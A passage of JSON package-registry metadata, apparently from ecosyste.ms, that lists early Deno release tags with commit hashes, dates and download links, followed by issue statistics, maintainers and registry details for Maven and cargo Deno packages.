url":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.755Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.530816956159015,"dependent_packages_count":45.07863008755334,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":38.304723521856175},"purl":"pkg:maven/org.mvnpm.at.deno/linux-x64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-x64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-x64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:linux-x64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4047089,"name":"deno_cli","ecosystem":"cargo","description":"A secure JavaScript/TypeScript runtime built with V8, Rust, and Tokio","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":14,"first_release_published_at":"2019-04-01T19:51:28.856Z","latest_release_published_at":"2020-01-17T19:13:00.672Z","latest_release_number":"0.23.3","last_synced_at":"2026-09-07T22:55:53.458Z","created_at":"2022-04-12T09:58:19.537Z","updated_at":"2026-09-08T00:40:33.253Z","registry_url":"https://crates.io/crates/deno_cli/","install_command":"cargo install 